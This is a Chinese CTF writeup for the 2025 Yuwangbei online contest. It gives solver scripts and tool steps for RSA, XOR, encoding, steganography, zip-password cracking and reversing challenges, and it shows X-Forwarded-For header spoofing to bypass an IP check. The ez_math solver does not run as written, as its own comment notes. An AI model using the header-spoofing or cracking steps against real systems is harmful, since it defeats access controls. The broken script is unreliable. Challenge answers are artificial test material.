2025第九届御网杯线上赛Writeup

2025御网杯Writeup

image-20250511175742384

  • 根本来不及写wp,急死我了QAQ

Crypto

1、baby_rsa

img

from gmpy2 import iroot, next_prime, invert, powmod
from Crypto.Util.number import long_to_bytes

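def factor_n(n):
    """Recover (p, q) for a modulus whose two primes sit right next to sqrt(n).

    The only strategy tried is: take the integer square root of ``n``, step to
    the next prime above it, and divide. That works precisely when one prime
    is the first prime above isqrt(n), i.e. when the key was generated with
    primes far too close together. Generating the two primes independently,
    with a large gap between them, defeats this.

    Args:
        n: RSA modulus to factor.

    Returns:
        A ``(p, q)`` tuple with ``p * q == n``.

    Raises:
        ValueError: if the next prime above sqrt(n) does not divide ``n``,
            i.e. the close-primes assumption does not hold for this modulus
            (the original silently returned a wrong ``q`` in that case).
    """
    root = iroot(n, 2)[0]
    p = next_prime(root)
    q, remainder = divmod(n, p)
    if remainder:
        raise ValueError(
            "next prime above sqrt(n) does not divide n; "
            "the close-primes assumption does not hold for this modulus"
        )
    return p, q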

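def decrypt(ciphertext, e, p, q):
    """Decrypt an RSA ciphertext from the two prime factors of its modulus.

    Only builtin integer arithmetic is used, so the function no longer
    depends on gmpy2 and reports an unusable exponent with a clear error
    instead of a ZeroDivisionError from ``invert``.

    Args:
        ciphertext: the integer ciphertext ``c``.
        e: public exponent.
        p: first prime factor of the modulus.
        q: second prime factor of the modulus.

    Returns:
        The plaintext integer ``c ** d mod (p * q)``.

    Raises:
        ValueError: if ``e`` has no inverse modulo phi(n), i.e. gcd(e, phi) != 1.
    """
    n = p * q
    phi = (p - 1) * (q - 1)
    d = _modular_inverse(e, phi)
    return pow(ciphertext, d, n)


def _modular_inverse(a, m):
    """Return a^-1 mod m by the extended Euclidean algorithm.

    Args:
        a: value to invert.
        m: modulus (must be positive).

    Raises:
        ValueError: when gcd(a, m) != 1, so no inverse exists.
    """
    old_r, r = a, m
    old_s, s = 1, 0
    while r:
        quotient = old_r // r
        old_r, r = r, old_r - quotient * r
        old_s, s = s, old_s - quotient * s
    if old_r != 1:
        raise ValueError("no modular inverse: gcd(a, m) != 1")
    return old_s % m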

def main():
    """Factor the challenge modulus, report the factors, and print the decrypted bytes."""
    # Challenge parameters as given.
    n = 12194420073815392880989031611545296854145241675320130314821394843436947373331080911787176737202940676809674543138807024739454432089096794532016797246441325729856528664071322968428804098069997196490382286126389331179054971927655320978298979794245379000336635795490242027519669217784433367021578247340154647762800402140321022659272383087544476178802025951768015423972182045405466448431557625201012332239774962902750073900383993300146193300485117217319794356652729502100167668439007925004769118070105324664379141623816256895933959211381114172778535296409639317535751005960540737044457986793503218555306862743329296169569
    e = 65537
    c = 4504811333111877209539001665516391567038109992884271089537302226304395434343112574404626060854962818378560852067621253927330725244984869198505556722509058098660083054715146670767687120587049288861063202617507262871279819211231233198070574538845161629806932541832207041112786336441975087351873537350203469642198999219863581040927505152110051313011073115724502567261524181865883874517555848163026240201856207626237859665607255740790404039098444452158216907752375078054615802613066229766343714317550472079224694798552886759103668349270682843916307652213810947814618810706997339302734827571635179684652559512873381672063

    p, q = factor_n(n)

    # Report both factors, then whether they multiply back to n.
    for label, value in (("p", p), ("q", q)):
        print(f"{label} = {value}")
    print(f"Verification: p*q == n? {p*q == n}")

    recovered = decrypt(c, e, p, q)
    print("Decrypted message:")
    print(long_to_bytes(recovered))

if __name__ == "__main__":
    # Only run the solver when executed as a script, not when imported.
    main()

img

2、cry_rsa

img

以下是计算RSA私钥指数 d 并生成flag的Python脚本:

import math

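def extended_gcd(a, b):
    """Return ``(g, x, y)`` with ``a*x + b*y == g == gcd(a, b)``.

    Iterative form of the extended Euclidean algorithm. It yields the same
    Bezout coefficients as the recursive version it replaces, but cannot hit
    Python's recursion limit on large (RSA-sized) inputs.

    Args:
        a: first integer.
        b: second integer.

    Returns:
        Tuple ``(g, x, y)``; for ``b == 0`` this is ``(a, 1, 0)``.
    """
    old_r, r = a, b
    old_s, s = 1, 0
    old_t, t = 0, 1
    while r != 0:
        quotient = old_r // r
        # Each step keeps the invariant old_r == a*old_s + b*old_t.
        old_r, r = r, old_r - quotient * r
        old_s, s = s, old_s - quotient * s
        old_t, t = t, old_t - quotient * t
    return (old_r, old_s, old_t)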

def modinv(a, m):
    """Return the inverse of ``a`` modulo ``m``, or ``None`` when gcd(a, m) != 1."""
    gcd_value, coeff, _ = extended_gcd(a, m)
    if gcd_value == 1:
        return coeff % m
    return None  # a and m share a factor, so no inverse exists

# Given values: the two primes and the public exponent supplied by the challenge.
p = 473398607161
q = 4511491
e = 19

# Calculate n and phi(n); n itself is not used further below.
n = p * q
phi_n = (p - 1) * (q - 1)

# Compute d (modular inverse of e mod phi(n)); None when gcd(e, phi_n) != 1.
d = modinv(e, phi_n)

if d is not None:
    # The challenge defines the flag as d + 8; the doubled braces in the
    # f-string print literal "{" and "}" around it.
    flag = d + 8
    print(f"d = {d}")
    print(f"flag = flag{{{flag}}}")
else:
    print("No modular inverse exists for the given e and φ(n).")

解释:

  1. **extended_gcd(a, b)**:使用扩展欧几里得算法求解 ax + by = gcd(a, b),返回 (gcd, x, y)
  2. **modinv(a, m)**:计算 a 在模 m 下的乘法逆元(即 a⁻¹ mod m)。如果逆元不存在(gcd(a, m) ≠ 1),返回 None
  3. 计算步骤
    1. 计算 n = p * q,φ(n) = (p-1)(q-1)
    2. modinv(e, phi_n) 求解 d(即 e⁻¹ mod φ(n))。
    3. 最终flag是 d + 8
import math

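def extended_gcd(a, b):
    """Return ``(g, x, y)`` with ``a*x + b*y == g == gcd(a, b)``.

    Iterative form of the extended Euclidean algorithm. It yields the same
    Bezout coefficients as the recursive version it replaces, but cannot hit
    Python's recursion limit on large (RSA-sized) inputs.

    Args:
        a: first integer.
        b: second integer.

    Returns:
        Tuple ``(g, x, y)``; for ``b == 0`` this is ``(a, 1, 0)``.
    """
    old_r, r = a, b
    old_s, s = 1, 0
    old_t, t = 0, 1
    while r != 0:
        quotient = old_r // r
        # Each step keeps the invariant old_r == a*old_s + b*old_t.
        old_r, r = r, old_r - quotient * r
        old_s, s = s, old_s - quotient * s
        old_t, t = t, old_t - quotient * t
    return (old_r, old_s, old_t)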

def modinv(a, m):
    """Return the inverse of ``a`` modulo ``m``, or ``None`` when gcd(a, m) != 1."""
    gcd_value, coeff, _ = extended_gcd(a, m)
    if gcd_value == 1:
        return coeff % m
    return None  # a and m share a factor, so no inverse exists

# Given values: the two primes and the public exponent supplied by the challenge.
p = 473398607161
q = 4511491
e = 19

# Calculate n and phi(n); n itself is not used further below.
n = p * q
phi_n = (p - 1) * (q - 1)

# Compute d (modular inverse of e mod phi(n)); None when gcd(e, phi_n) != 1.
d = modinv(e, phi_n)

if d is not None:
    # The challenge defines the flag as d + 8; the doubled braces in the
    # f-string print literal "{" and "}" around it.
    flag = d + 8
    print(f"d = {d}")
    print(f"flag = flag{{{flag}}}")
else:
    print("No modular inverse exists for the given e and φ(n).")

img

3、ez_base

img

Dear Friend ; Especially for you - this amazing announcement 
. This is a one time mailing there is no need to request
removal if you won't want any more ! This mail is being
sent in compliance with Senate bill 2316 , Title 1
; Section 303 ! This is not a get rich scheme . Why
work for somebody else when you can become rich in
77 months . Have you ever noticed society seems to
be moving faster and faster and more people than ever
are surfing the web ! Well, now is your chance to capitalize
on this ! We will help you turn your business into
an E-BUSINESS and sell more . You can begin at absolutely
no cost to you . But don't believe us . Ms Ames who
resides in Indiana tried us and says "Now I'm rich,
Rich, RICH" . We are licensed to operate in all states
. If not for you then for your LOVED ONES - act now
! Sign up a friend and you'll get a discount of 30%
! Thank-you for your serious consideration of our offer
. Dear Salaryman ; This letter was specially selected
to be sent to you ! This is a one time mailing there
is no need to request removal if you won't want any
more . This mail is being sent in compliance with Senate
bill 1619 , Title 6 ; Section 303 ! This is not a get
rich scheme ! Why work for somebody else when you can
become rich within 50 DAYS ! Have you ever noticed
how long the line-ups are at bank machines plus nobody
is getting any younger . Well, now is your chance to
capitalize on this ! WE will help YOU process your
orders within seconds & SELL MORE . You can begin at
absolutely no cost to you ! But don't believe us !
Mrs Ames of Minnesota tried us and says "I've been
poor and I've been rich - rich is better" ! We are
licensed to operate in all states ! We BESEECH you
- act now ! Sign up a friend and you'll get a discount
of 60% . Thank-you for your serious consideration of
our offer . Dear Internet user , Especially for you
- this hot news ! We will comply with all removal requests
! This mail is being sent in compliance with Senate
bill 1623 ; Title 2 , Section 309 ! THIS IS NOT A GET
RICH SCHEME . Why work for somebody else when you can
become rich within 29 weeks . Have you ever noticed
people love convenience & nearly every commercial on
television has a .com on in it ! Well, now is your
chance to capitalize on this . We will help you increase
customer response by 160% and deliver goods right to
the customer's doorstep ! You can begin at absolutely
no cost to you ! But don't believe us . Mr Jones of
California tried us and says "My only problem now is
where to park all my cars" ! We are licensed to operate
in all states . We implore you - act now ! Sign up
a friend and you get half off . Thanks .

img

https://www.spammimic.com/decode.shtml

img

img

ZmxhZ3tITkNURlpJaUZXQTlmUko2VEZ9

img

4、gift

img

五一劳动节爸爸给家里人带了一个礼物。由于礼物不好拿,所以把礼物平均分成了四份,但是其中一份不小心掉在地上散落成了无数片,变成了 1 - 1/3 + 1/5 - 1/7 + …
聪明的你能算出或猜出爸爸带的礼物是什么吗?flag示例: flag{apple} flag{watermelon} 提交flag值凯撒密码加密,偏移量5在提交。

加密过程

以 flag{pie} 为例:

  • { → {(非字母不变)
  • p → u
  • i → n
  • e → j
  • } → }(非字母不变)

提交的flag值为:flag{unj}

5、草甸方阵的密语

img

  • 先凯撒,再栅栏

6、easy-签到题

img

  • 随波逐流

img

img

MISC

7、ez_picture

img

  • 随波逐流看图片

img

  • 解压

img

  • 查看图片详细信息

img

ZmxhZ3tITkNURlBmSlgzbkdDaXQ1fQ==

img

flag{HNCTFPfJX3nGCit5}

8、easy_misc

img

  • 查看密文

img

77 49 66 77 83 107 104 68 78 70 81 50 90 50 104 87 98 87 74 76 82 69 90 53 99 88 100 50 86 87 116 81 84 70 86 78 86 122 86 70 98 48 85 61 
  • 随波逐流一把嗦

img

  • 随波逐流二把嗦

img

synt{UAPGSQFaDfY1QCmSa}
  • 随波逐流三把嗦

img

  • 终于嗦出来了

9、套娃

img

  • 最里面的修改为.doc后缀
  • 修改字体颜色

img

10、ez_xor

img

  1. 题目分析:题目给出的密文是 5f-55-58-5e-42-71-7a-6d-7f-48-4e-5c-78-6a-7d-08-08-00-44,这是一个十六进制格式的字符串。题目名称 ez_xor 提示我们可能使用了异或加密。
  2. 异或加密原理:异或加密是一种对称加密方法,加密和解密使用相同的密钥。加密过程为 密文 = 明文 ^ 密钥,解密过程为 明文 = 密文 ^ 密钥
  3. 解题步骤
    1. 将十六进制字符串转换为字节序列。
    2. 猜测或尝试常见的异或密钥(如单字节密钥)。
    3. 对密文进行异或操作,尝试解密出有意义的明文(flag)。
  4. 脚本
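cipher = bytes.fromhex("5f55585e42717a6d7f484e5c786a7d08080044")


def find_single_byte_xor_keys(data, markers=(b"flag", b"FLAG")):
    """Try every single-byte XOR key against ``data`` and keep plausible hits.

    Args:
        data: ciphertext bytes.
        markers: byte strings, any of which marks a plausible plaintext.

    Returns:
        ``[(key, text), ...]`` in ascending key order for each key in 0..255
        whose XOR with ``data`` contains one of the markers. ``text`` is
        decoded as UTF-8 with undecodable bytes replaced, so a stray byte in
        one candidate can no longer abort the whole search (the original
        called ``.decode()`` unguarded).
    """
    hits = []
    for key in range(256):  # every possible single-byte key
        candidate = bytes(b ^ key for b in data)
        if any(marker in candidate for marker in markers):
            hits.append((key, candidate.decode("utf-8", errors="replace")))
    return hits


for key, text in find_single_byte_xor_keys(cipher):
    print(f"Key: {key}, Flag: {text}")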

img

11、光隙中的寄生密钥

img

  • 随波逐流binwalk提取

img

  • ARCHPR爆破压缩包密码
  • 9864

img

img

img

5a6d78685a33744861435134544731514e56356b55544a6d546a596d66513d3d

img

ZmxhZ3tHaCQ4TG1QNV5kUTJmTjYmfQ==

img

flag{Gh$8LmP5^dQ2fN6&}

12、被折叠的显影图纸

img

  • 随波逐流一把嗦

img

Re

13、ez_math

img

from sage.all import PolynomialRing, QQ
from scipy.optimize import least_squares
import numpy as np

def solve_flag() -> None:
    """Try to recover a 38-character flag from a system of quadratic equations.

    The first five characters ("flag{") and the last ("}") are fixed; the
    remaining 32 unknowns are fitted numerically with scipy's least_squares
    and each value is rounded and clamped to printable ASCII before printing.
    """
    # Polynomial ring over the rationals with 38 generators. Only the tuple
    # `x` is bound here; the individual generators get no names of their own.
    R = PolynomialRing(QQ, 38, 'x')
    x = R.gens()

    # Known flag format: "flag{" prefix and "}" suffix as ASCII codes.
    known = {
        x[0]: 102, # 'f'
        x[1]: 108, # 'l'
        x[2]: 97, # 'a'
        x[3]: 103, # 'g'
        x[4]: 123, # '{'
        x[37]: 125 # '}'
    }

    # Polynomial system (example).
    # NOTE(review): the terms below use bare names x0 ... x37, but this
    # function only binds the tuple `x` above, so evaluating this list raises
    # NameError as written; the generators would have to be unpacked into
    # those names (or referenced as x[i]) first.
    eqs = [
        x0 * x16 + x10 * x18 + 2 * (x11 * x25) + 5 * (x13 * x25) - 9 * (x13 * x32) - 8 * (x15 * x29) + 8 * (x17 * x28) + 7 * (x19 * x29) - 5 * (x19 * x30) - 7 * (x19 * x9) - 4 * x20 * x20 + 7 * (x22 * x23) - 5 * (x23 * x8) - 8 * (x29 * x5) - 7 * x31 + 7 * (x32 * x9) + 10 * (x33 * x4) + 8 * x5 * x5 - 5 * x8 * x8 - 16191 ,
        -9 * (x1 * x15) - 2 * (x10 * x18) + 9 * (x11 * x18) - 6 * (x12 * x16) - x14 * x15 - 3 * (x15 * x18) - 9 * (x16 * x8) + 10 * (x17 * x23) + 4 * (x17 * x5) - 2 * (x2 * x22) - 4 * x2 + 4 * (x21 * x3) + 10 * (x23 * x25) + 5 * (x28 * x33) + 10 * (x28 * x5) - 8 * (x30 * x36) - 14067 ,
        10 * (x0 * x26) + 6 * (x0 * x29) - 7 * (x13 * x29) + 8 * (x21 * x7) + 9 * (x22 * x25) - 8 * (x23 * x5) + 8 * (x26 * x32) + 5 * (x27 * x30) + 9 * (x27 * x31) + 6 * (x28 * x6) - 9 * (x29 * x5) - 4 * (x31 * x8) - 10 * (x32 * x35) + 10 * x35 * x35 - 55102 ,
        3 * (x0 * x16) + 4 * (x1 * x36) + 8 * (x10 * x33) - 8 * (x12 * x17) - 8 * (x14 * x28) + 7 * (x15 * x25) - 2 * (x15 * x6) + 6 * (x15 * x8) - 2 * (x2 * x25) - 7 * (x2 * x34) + x23 * x35 - 5 * (x27 * x9) + 6 * (x28 * x30) + 6 * (x28 * x37) + 8 * (x28 * x7) - 4 * x30 + 7 * (x32 * x35) + 7 * (x35 * x5) + 7 * (x35 * x7) - 10 * (x5 * x7) - 2 * (x7 * x9) - 102697 ,
        7 * (x0 * x27) + 3 * (x1 * x15) - 9 * (x1 * x29) - 3 * (x10 * x33) - 10 * (x12 * x34) - 8 * (x15 * x2) - 8 * (x18 * x23) - 6 * (x19 * x7) - 6 * (x2 * x34) + 7 * (x2 * x7) - 3 * (x20 * x22) - 8 * (x23 * x25) - 3 * (x26 * x34) - 9 * (x28 * x3) - 8 * (x28 * x35) + 3 * (x36 * x4) + 6 * x8 + 324145 ,
        -9 * (x0 * x2) + 5 * x1 - 9 * (x13 * x3) + 4 * (x14 * x17) + 9 * (x18 * x29) + 5 * (x18 * x9) + 5 * (x20 * x23) - x20 * x5 - 8 * (x21 * x33) - 7 * x27 + 6 * (x28 * x7) - 7 * (x29 * x9) + 10 * (x31 * x6) + 52822 ,
        -6 * (x10 * x29) - 2 * (x10 * x33) + 4 * (x11 * x31) + 8 * (x12 * x27) - 9 * (x12 * x36) + 2 * (x16 * x24) + 2 * (x19 * x34) - 8 * (x19 * x37) - 10 * (x24 * x7) - 5 * (x34 * x6) - 2 * (x7 * x8) + 9 * x9 + 119387 ,
        6 * (x0 * x22) - 3 * (x12 * x37) - 3 * (x12 * x5) - 2 * (x13 * x36) - 10 * (x19 * x5) + 7 * (x2 * x22) + 7 * (x2 * x9) - 8 * x21 * x21 + x21 * x34 - 5 * (x23 * x26) + 9 * (x25 * x5) + 8 * (x25 * x9) + 4 * (x3 * x30) - 3 * (x37 * x7) - 6 * (x37 * x9) + 4832 ,
        -2 * x0 * x0 + 3 * (x13 * x29) + x17 * x25 - 10 * (x21 * x28) + 5 * (x22 * x31) + 10 * (x22 * x9) - 10 * (x25 * x32) + 4 * x27 + 6 * (x29 * x6) - 4 * (x30 * x34) - 9 * (x31 * x4) + 2 * (x32 * x34) - 7 * (x4 * x6) + 123454 ,
        4 * (x0 * x20) + x0 * x3 - 9 * (x1 * x17) + 9 * (x11 * x34) - 6 * (x13 * x7) - 6 * (x14 * x2) + 6 * (x14 * x29) + 7 * (x15 * x27) - 7 * (x18 * x5) - 7 * x20 * x20 + 8 * (x20 * x21) + 9 * (x20 * x27) + 2 * (x21 * x25) - 6 * (x25 * x28) - 9 * (x28 * x32) - 6 * (x3 * x32) - 3 * (x33 * x7) - 8 * (x36 * x9) + 170296 ,
        6 * (x0 * x11) + x1 * x12 - 9 * (x1 * x30) - 10 * (x1 * x35) + 8 * (x10 * x7) + 5 * (x14 * x28) + 7 * (x16 * x21) - 10 * (x19 * x35) + x19 * x6 + 8 * (x2 * x31) - 2 * (x21 * x26) - 3 * (x23 * x27) + 9 * (x27 * x34) + 4 * x28 * x28 - x3 * x31 + x30 * x37 - 9 * (x30 * x4) + 4 * x34 - 76173 ,
        -8 * (x0 * x15) - 4 * (x11 * x15) + 9 * (x12 * x23) - 10 * (x12 * x29) + 8 * (x13 * x26) + 6 * (x13 * x9) - x15 * x27 - x15 * x33 + 3 * (x19 * x29) - 10 * (x2 * x20) - x22 * x32 + 5 * (x23 * x8) + 6 * (x32 * x5) - 27078 ,
        8 * (x1 * x9) + 8 * (x10 * x16) - 3 * (x10 * x29) - 2 * (x11 * x13) + 6 * (x11 * x33) + 3 * (x12 * x14) + 8 * (x12 * x16) + 5 * (x16 * x34) + 7 * (x18 * x32) + 8 * (x19 * x26) + 2 * x19 - 4 * (x20 * x6) + 4 * x22 * x22 - 8 * (x25 * x5) - 7 * (x26 * x34) - x29 + 10 * (x3 * x4) - 6 * x32 * x32 - 299677 ,
        3 * (x0 * x6) + 7 * (x10 * x34) + 9 * (x11 * x18) - 8 * (x12 * x3) - x12 * x33 - x12 * x34 - 7 * (x16 * x7) + x16 * x8 - 3 * (x19 * x20) - 6 * (x19 * x33) - 8 * (x22 * x27) - 4 * (x24 * x3) + 57797 ,
        9 * (x0 * x29) + 2 * (x1 * x19) + 8 * (x10 * x30) - 2 * (x11 * x20) - 6 * (x11 * x29) + 3 * (x13 * x20) - 10 * (x14 * x17) - 10 * (x15 * x19) + 6 * (x15 * x23) + 7 * (x15 * x4) + 6 * (x18 * x28) + x19 * x3 - x20 * x3 - 10 * (x21 * x30) + 10 * (x22 * x27) - 10 * (x23 * x31) + 2 * (x24 * x5) - 3 * (x25 * x31) + 5 * (x26 * x7) + 7 * x3 * x3 + 7 * (x30 * x32) + 6 * (x31 * x5) + 10 * x33 - 7 * x5 - 258015 ,
        2 * (x0 * x16) - 6 * (x1 * x20) + 5 * (x10 * x17) - 5 * (x15 * x23) + 8 * (x16 * x18) + 9 * (x19 * x36) + 6 * (x2 * x33) - 9 * (x23 * x9) + 9 * x25 * x25 + 2 * (x3 * x37) + 7 * (x30 * x34) - 2 * x32 - 157310 ,
        -3 * (x0 * x25) - 2 * (x1 * x36) + 2 * (x10 * x31) + 9 * (x13 * x20) - 5 * (x15 * x2) - 6 * (x15 * x37) - 2 * x17 + 8 * (x19 * x28) + 7 * (x2 * x32) - 2 * (x21 * x30) + 5 * (x23 * x5) + 5 * (x24 * x26) - 8 * (x24 * x33) - 8 * (x26 * x35) - 10 * x26 - 10 * (x29 * x36) - 2 * (x30 * x6) + 4 * (x31 * x36) + 9 * (x33 * x9) - x37 * x6 + 7350 ,
        -8 * (x0 * x36) - 8 * (x17 * x32) + 8 * (x2 * x33) - 7 * (x22 * x28) - 9 * (x22 * x35) + 8 * (x22 * x5) - 2 * (x23 * x5) + 5 * (x26 * x27) + 6 * (x26 * x31) - 3 * (x32 * x33) - 2 * (x35 * x4) + x36 * x8 + 85362 ,
        7 * (x0 * x33) - 5 * (x12 * x35) + x12 * x9 + 10 * (x13 * x30) + 8 * (x15 * x32) - 9 * (x2 * x20) + 3 * (x2 * x30) + 10 * (x25 * x29) - 6 * (x26 * x32) - 3 * (x27 * x9) + 7 * (x36 * x6) - 121182 ,
        8 * (x0 * x17) + 10 * (x1 * x14) + 2 * (x10 * x33) + 8 * (x13 * x26) - 5 * (x14 * x34) - 9 * (x14 * x7) + x18 * x2 - 10 * (x18 * x7) + x2 * x33 + 10 * x20 - 6 * (x22 * x30) + 6 * (x22 * x9) + 10 * (x23 * x34) + 9 * (x25 * x9) + 7 * (x26 * x30) - 9 * (x27 * x31) + 7 * (x28 * x5) - 8 * (x30 * x31) - 9 * x34 * x34 + 2 * (x36 * x8) - 136304 ,
        -4 * (x0 * x25) - 9 * (x1 * x21) - 9 * (x1 * x25) + 6 * (x12 * x5) + 6 * (x2 * x28) - 4 * (x20 * x28) - 8 * (x22 * x23) + 5 * (x23 * x32) - 6 * (x24 * x28) - 6 * (x25 * x29) + 121526 ,
        -4 * (x0 * x30) + x11 * x14 - 6 * (x12 * x20) - 8 * (x13 * x28) + 10 * (x15 * x2) - 10 * (x18 * x25) + 6 * (x22 * x29) - 3 * (x25 * x8) + x27 * x36 - 2 * (x3 * x30) + 10 * (x30 * x34) + 4 * (x35 * x6) - 27523 ,
        -9 * (x10 * x30) - 3 * (x10 * x6) - 10 * (x13 * x29) - 8 * (x13 * x7) + 3 * (x14 * x32) - 2 * (x18 * x20) + 10 * (x18 * x34) - 4 * (x2 * x7) + 9 * (x20 * x22) - 5 * (x20 * x33) - 10 * (x23 * x34) - 6 * x26 + 2 * (x3 * x34) + 9 * x30 * x30 + 8 * (x31 * x8) + 9 * (x33 * x36) + 35830 ,
        7 * (x10 * x2) + 2 * x10 - 5 * (x13 * x9) + 10 * (x15 * x33) + 8 * (x17 * x23) + 5 * x2 * x2 - 8 * (x2 * x37) + 6 * (x20 * x24) + 4 * (x20 * x35) - 8 * (x23 * x8) - 9 * (x24 * x7) + 7 * (x26 * x8) - 5 * (x3 * x36) + 6 * (x30 * x35) - 7 * x36 - 5 * x7 - 59235 ,
        -8 * x11 * x11 - 9 * (x14 * x31) - 8 * (x14 * x35) + 7 * (x15 * x20) + x15 * x24 + 6 * (x15 * x25) - 10 * (x16 * x18) - x16 * x9 + 8 * (x19 * x32) + 5 * (x2 * x5) + 6 * (x21 * x30) - 10 * (x22 * x24) + 2 * (x22 * x34) - 10 * (x22 * x37) + 4 * (x27 * x35) - x28 * x33 + 2 * (x28 * x37) + 7 * (x29 * x37) - 2 * (x34 * x35) - 7 * (x35 * x6) + 82407 ,
        7 * (x0 * x27) + 7 * (x10 * x21) - 10 * (x10 * x3) + 6 * (x13 * x36) - 3 * (x15 * x17) + 7 * (x15 * x30) - x15 * x7 + x16 * x34 + 8 * (x17 * x37) + 2 * x2 + 6 * (x20 * x21) + 9 * (x20 * x33) + 8 * (x20 * x4) + 3 * (x21 * x25) + x22 * x28 + 6 * x23 * x23 - 6 * (x24 * x3) + 10 * (x25 * x27) + 5 * (x29 * x4) - 6 * (x3 * x32) - 6 * (x30 * x4) - 5 * (x30 * x5) - x33 * x34 - 7 * (x4 * x9) - 4 * (x7 * x9) - 154206 ,
        2 * x0 * x0 + 2 * (x0 * x14) + 7 * (x11 * x13) - 9 * (x11 * x16) + 2 * (x11 * x21) + 8 * (x11 * x24) + 5 * (x11 * x4) + 4 * (x13 * x36) - 8 * (x15 * x16) - 4 * (x16 * x17) - 3 * (x16 * x23) - 8 * (x17 * x33) - 4 * (x17 * x34) - 6 * (x18 * x31) + 7 * (x2 * x25) - x20 * x25 + 5 * (x20 * x9) + 2 * (x21 * x26) - 5 * (x21 * x5) + 4 * (x22 * x35) - 7 * (x23 * x9) - 10 * (x31 * x7) + 156020 ,
        -5 * (x12 * x34) + 4 * (x12 * x9) - 2 * (x13 * x31) + x14 * x9 + 4 * (x17 * x32) - 2 * (x18 * x23) - 10 * (x18 * x29) + 6 * (x19 * x30) + 4 * (x2 * x32) - 9 * x27 * x27 - 2 * (x3 * x35) - 2 * (x3 * x5) - 2 * (x7 * x8) + 129397 ,
        -9 * x1 + 5 * (x12 * x2) + 4 * (x12 * x35) - 5 * (x14 * x8) + 2 * x15 + 3 * (x17 * x22) - 3 * (x17 * x23) + 9 * (x18 * x33) - 5 * (x20 * x23) - 8 * (x20 * x34) - 8 * (x29 * x6) + 70585 ,
        x0 * x1 + 6 * (x0 * x12) + 10 * (x10 * x31) + 8 * (x11 * x32) + 9 * (x13 * x14) - 2 * (x15 * x33) - 9 * (x15 * x9) + 4 * (x16 * x9) - 2 * (x18 * x29) - 5 * (x2 * x36) + 2 * (x21 * x32) - 8 * (x24 * x33) + 9 * (x25 * x26) + x26 * x28 - x26 * x3 - 3 * (x26 * x6) + 6 * x29 - 2 * (x37 * x7) - 119430 ,
        x0 * x2 + 10 * x10 + 6 * (x12 * x18) - 5 * (x12 * x35) + 9 * (x13 * x29) - 2 * (x14 * x37) + 10 * (x15 * x23) + 7 * (x15 * x4) - 5 * (x16 * x9) - 9 * (x20 * x8) - 4 * (x21 * x27) - 5 * (x22 * x5) + x28 * x6 + x3 * x36 + 8 * (x33 * x35) - 144386 ,
        -5 * (x1 * x12) + 4 * (x1 * x6) + 4 * (x11 * x5) + 8 * (x15 * x20) + 7 * (x15 * x22) - 10 * (x19 * x29) - 6 * x2 * x2 + 5 * (x2 * x31) - 2 * (x2 * x9) + 2 * (x20 * x35) + 7 * (x29 * x5) + 8 * (x30 * x7) + 8 * (x35 * x4) - 2 * x37 * x37 - 99154 ,
        -2 * x0 * x0 + 5 * (x0 * x11) - 10 * (x0 * x21) + 9 * (x0 * x30) - 2 * (x1 * x29) + 6 * (x10 * x29) - 9 * (x10 * x30) - 8 * (x10 * x32) + 9 * x11 * x11 - 9 * (x11 * x5) - x13 * x17 + 5 * (x13 * x6) + 9 * (x14 * x20) - 10 * x18 * x18 - 5 * (x19 * x24) + 7 * (x2 * x26) + 10 * (x20 * x21) - 9 * (x24 * x34) - 5 * (x24 * x5) - 9 * (x26 * x32) - 6 * (x30 * x7) - 7 * (x32 * x37) + 414339 ,
        2 * (x0 * x21) - 10 * (x0 * x35) + 9 * (x11 * x15) - 2 * (x12 * x4) + 4 * (x16 * x4) + 2 * (x17 * x32) - 8 * (x2 * x20) + 10 * (x21 * x23) + 2 * (x21 * x27) - 5 * (x21 * x30) + 8 * (x22 * x30) + 2 * (x25 * x4) + 9 * (x28 * x34) + 3 * (x30 * x5) + 4 * (x33 * x7) - 3 * (x6 * x8) - 169458 ,
        x10 * x31 - 4 * (x10 * x4) - x11 * x22 - 10 * (x12 * x5) - 4 * (x16 * x19) + 3 * (x19 * x2) + 3 * (x19 * x34) - 6 * x19 + 4 * (x2 * x32) - 8 * (x22 * x33) + 8 * x23 * x23 + 2 * (x24 * x6) + 8 * x31 + 2 * (x5 * x7) - 26425 ,
        8 * (x1 * x35) - 3 * (x1 * x7) - 3 * (x14 * x23) - 6 * (x16 * x28) - 2 * (x16 * x6) - 7 * x16 + 4 * (x2 * x4) + x21 * x24 - 5 * (x23 * x3) - 9 * (x24 * x30) + 9 * (x26 * x35) - 8 * (x28 * x4) - 9 * (x3 * x32) + 2 * x3 + 209624 ,
        -10 * (x0 * x28) + 2 * (x0 * x3) + 8 * (x10 * x30) - x11 * x31 + 6 * (x13 * x32) + 10 * (x14 * x36) + 5 * (x15 * x23) + 2 * (x15 * x31) + 2 * (x16 * x25) + 10 * (x16 * x30) - 10 * (x18 * x22) + 8 * (x19 * x6) - 7 * (x2 * x36) - x21 * x29 - 4 * (x24 * x4) + 8 * (x26 * x5) + 10 * (x31 * x5) - 5 * (x32 * x7) - 4 * (x36 * x5) - 146637 ,
        -2 * (x1 * x23) + 9 * (x10 * x9) + 9 * (x15 * x21) + 10 * (x16 * x25) + 5 * (x16 * x36) + 7 * (x16 * x6) + 7 * (x18 * x35) + 8 * (x19 * x3) - 9 * (x19 * x35) + 10 * (x2 * x32) + 5 * (x2 * x4) - x21 * x27 - 6 * (x24 * x35) - 3 * (x25 * x26) + 6 * (x29 * x36) + 6 * (x29 * x4) - 3 * (x33 * x4) - 5 * (x34 * x5) - 3 * (x37 * x7) + 9 * (x4 * x8) - 422738 ,
    ]

    # Substitute the known characters into every equation; the unknowns are
    # the generators that do not appear in `known`.
    remaining_vars = [v for v in x if v not in known]
    simplified = [eq.subs(known) for eq in eqs]

    # Residual vector for the numerical solver: every simplified equation
    # evaluated at the current guess for the remaining variables.
    def objective(vars):
        values = dict(zip(remaining_vars, vars))
        return [float(eq.subs(values)) for eq in simplified]

    # Least-squares fit (method 'lm') from a flat initial guess of 100 for
    # every unknown.
    sol = least_squares(objective, [100]*len(remaining_vars), method='lm')

    # Build the flag: known characters verbatim, fitted values rounded and
    # clamped to printable ASCII (32..126).
    flag = []
    for i in range(38):
        # The default passed to .get() is evaluated eagerly, so the conditional
        # guards the .index() call against generators that are not unknowns.
        val = known.get(x[i], sol.x[remaining_vars.index(x[i])] if x[i] in remaining_vars else 0)
        flag.append(chr(max(32, min(126, int(round(val))))))

    print("Possible flag:", ''.join(flag))

solve_flag()

img

15、sign in

img

  • IDA打开

img

  • 打断点在rc4加密函数结束
  • 看加密结果

Web

17、YWB_Web_xff

img

  • Yakit抓包
  • 添加 X-Forwarded-For: 2.2.2.1
POST / HTTP/1.1
Host: 47.105.113.86:40001
